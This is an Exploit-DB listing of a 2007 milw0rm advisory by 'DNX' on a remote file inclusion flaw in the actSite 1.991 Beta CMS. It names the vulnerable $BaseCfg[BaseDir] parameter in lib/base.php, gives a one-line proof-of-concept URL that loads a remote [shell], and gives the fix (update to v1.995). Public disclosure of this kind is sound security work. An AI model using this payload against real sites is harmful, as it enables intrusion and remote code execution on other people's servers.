actSite 1.991 Beta (base.php) Remote File Inclusion Vulnerability



EDB-ID: 4473 CVE: 2007-5175OSVDB-ID: 38589
Author: DNXPublished: 2007-10-01Verified: Verified
Exploit Code:   DownloadVulnerable App:   N/A

Rating

(0.0)
Prev Home Next
                             \#'#/
                             (-.-)
   ---------------------oOO---(_)---OOo--------------------
   | actSite v1.991 Beta (base.php) Remote File Inclusion |
   |                     coded by DNX                     |
   --------------------------------------------------------
[!] Discovered: DNX
[!] Vendor: http://www.actsite.de
[!] Detected: 02.09.2007
[!] Reported: 02.09.2007
[!] Remote: yes
[!] Background: actSite is a content management system based on PHP and MySQL
[!] Bug: $BaseCfg[BaseDir] in lib/base.php
[!] PoC:
    - http://[site]/[path]/lib/base.php?BaseCfg[BaseDir]=[shell]
[!] Solution: Install update to v1.995
# milw0rm.com [2007-10-01]






Comments

No comments so far